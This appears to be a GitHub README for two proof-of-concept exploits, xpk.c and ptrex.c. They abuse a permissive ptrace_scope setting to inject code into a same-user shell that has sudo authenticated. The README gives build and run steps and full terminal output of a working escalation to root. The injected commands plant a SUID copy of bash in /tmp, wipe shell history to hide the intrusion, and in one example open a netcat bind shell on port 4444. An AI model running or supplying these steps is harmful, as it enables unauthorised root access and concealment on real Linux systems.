Skip to content


Folders and files

Last commit message
Last commit date

Latest commit



36 Commits

Repository files navigation

ptrace misconfiguration local privilege escalation

ptrace misconfiguration Local Privilege Escalation

Please, consider make a donation:

WARNING! this is a POC, the code is CRAP

why this POC? why ptrace for this? just for fun. I know, I know you can get the sudo control in other different ways x)

video demo on youtube:

Injecting code via ptrace (with same user) in shells with sudo authenticated

Exploit Reqs:

  • ptrace enable to attach the processes of the user
  • terminal with a sudo user group (attacker)
  • terminal with the same user & sudo authenticated (victim)
  • run xpk or ptrex

WARNING: if GDB is installed in the machine is more safe run

'ptrace_scope' misconfiguration Local Privilege Escalation by Marcelo Vazquez (s4vitar) & Victor Lasa (vowkin)

my code is based in the s4vitar & vowkin POC and use ptrace (no GDB dep).

I made two POC-flavours for the same thing xpk.c & ptrex.c

Do you want a more advanced stuff? check


stdin hijack (using ptrace_do lib sudo -S cp /bin/bash /tmp + sudo -S chmod +s /tmp/bash + history -c

gcc -o xpk xpk.c

WARNING: only works for x86_64 systems (ptrace_do limitation)

  • can inject code from x86_64-xpk-compiled to x86_64 process
  • can inject code from x86_64-xpk-compiled to x86 process


shellcode injection (using ptrace) execve(python -c import os; os.system("echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1"));

gcc -o ptrex ptrex.c

You can also inject your own python code:

./ptrex full_python_path newcmdline

Example with

  • own python binary (limit 150 bytes): /home/dreg/tmp/python
  • bind bash shell python code (limit 250 bytes) : import os; os.system("/usr/bin/sudo /bin/nc -lvp 4444 -e /bin/bash")
./ptrex /home/dreg/tmp/python 'import os; os.system("/usr/bin/sudo /bin/nc -lvp 4444 -e /bin/bash")'
  • works for x86_64 systems & x86 systems
  • can inject code from x86_64-ptrex-compiled to x86_64 process
  • can inject code from x86-ptrex-compiled to x86 process
  • can inject code from x86_64-ptrex-compiled to x86 process

WARNING: inject code from x86-ptrex-compiled to x86_x64 process is not possible

How to test xpk.c:

Open a terminal with a sudo user group

execute any command with sudo and enter the password, ex:

dreg@fr33project:~$ tty
dreg@fr33project:~$ id
uid=1003(dreg) gid=1003(dreg) groups=1003(dreg),27(sudo)
dreg@fr33project:~$ sudo whoami
[sudo] password for dreg:

open other terminal with the same user and execute ./xpk (the name of the exploit executable is important, dont change!)

dreg@fr33project:~$ tty
dreg@fr33project:~$ .gcc -o xpk xpk.c
dreg@fr33project:~$ ./xpk
David Reguera Garcia aka Dreg exploit without gdb dep, based in:
'ptrace_scope' misconfiguration Local Privilege Escalation
Authors: Marcelo Vazquez  (s4vitar)
         Victor Lasa       (vowkin)

[*] PID -> bash
[*] Path 2660: /home/dreg
stdin fd: 4
echo "clear && echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1 | echo && history -c && clear" >> /tmp/crap
[*] PID -> bash
[*] Path 2892: /home/dreg
stdin fd: 4
echo "clear && echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1 | echo && history -c && clear" >> /tmp/crap
[*] PID -> sh
[*] Path 2998: /home/dreg
stdin fd: 4
echo "clear && echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1 | echo && history -c && clear" >> /tmp/crap
[*] PID -> bash
[*] Path 2999: /home/dreg
stdin fd: 4
echo "clear && echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1 | echo && history -c && clear" >> /tmp/crap

[*] Cleaning up...
[*] Spawning root shell...
bash-5.0# id
uid=1003(dreg) gid=1003(dreg) euid=0(root) egid=0(root) groups=0(root),27(sudo),1003(dreg)
bash-5.0# whoami

How to test ptrex.c:

Open a terminal with a sudo user group

execute any command with sudo and enter the password, ex:

dreg@fr33project:~$ tty
dreg@fr33project:~$ id
uid=1003(dreg) gid=1003(dreg) groups=1003(dreg),27(sudo)
dreg@fr33project:~$ sudo whoami
[sudo] password for dreg:

open other terminal with the same user and execute ./ptrex

dreg@fr33project:~$ tty
dreg@fr33project:~$ .gcc -o ptrex ptrex.c
dreg@fr33project:~$ ./ptrex
ptrex v0.3-beta - MIT License - Copyright 2020
David Reguera Garcia aka Dreg - [email protected] -
ptrace misconfiguration Local Privilege Escalation
using ptrace (no GDB dep) execve
Based from:
'ptrace_scope' misconfiguration Local Privilege Escalation by Marcelo Vazquez (s4vitar) & Victor Lasa (vowkin)

To change default python path & cmd injected: ./ptrex full_python_path newcmdline
    example: ./ptrex /home/dreg/tmp/python 'import os; os.system("/usr/bin/sudo /bin/nc -lvp 4444 -e /bin/bash")'

/proc/sys/kernel/yama/ptrace_scope : 0
pgrep "^(echo $(cat /etc/shells | tr '/' ' ' | awk 'NF{print $NF}' | tr '\n' '|'))$" -u "$(id -u)" | sed '$ d'
current pid: 18888
skipping current shell pid: 18888
current pid: 20156
elf plat: 64
waiting for process
getting registers
injecting shellcode at: 0x00007f33a88890e9
setting instruction pointer to: 0x00007f33a88890e9
please wait...
found suid shell: /tmp/bash
/tmp/bash -p -c 'rm /tmp/bash ; tput cnorm && /bin/bash -p'

bash-5.0# whoami

If this fail, try the bind shell example

Example ptrex.c bind shell netcat

This example needs netcat installed in the machine

Open a terminal with a sudo user group

execute any command with sudo and enter the password, ex:

dreg@fr33project:~$ tty
dreg@fr33project:~$ id
uid=1003(dreg) gid=1003(dreg) groups=1003(dreg),27(sudo)
dreg@fr33project:~$ sudo whoami
[sudo] password for dreg:

open other terminal with the same user and execute ./ptrex

dreg@fr33project:~$ tty
dreg@fr33project:~$ .gcc -o ptrex ptrex.c
dreg@fr33project:~$ ./ptrex /usr/bin/python 'import os; os.system("/usr/bin/sudo /bin/nc -lvp 4444 -e /bin/bash")'
dreg@fr33project:~$ nc 444


  • Parrot Home/Workstation: 4.6
  • Parrot Security: 4.6
  • CentOS / RedHat: 7.6
  • Kali Linux: 2018.4
  • Debian GNU/Linux: 10 (buster), 9.13 (stretch)


nobody loves me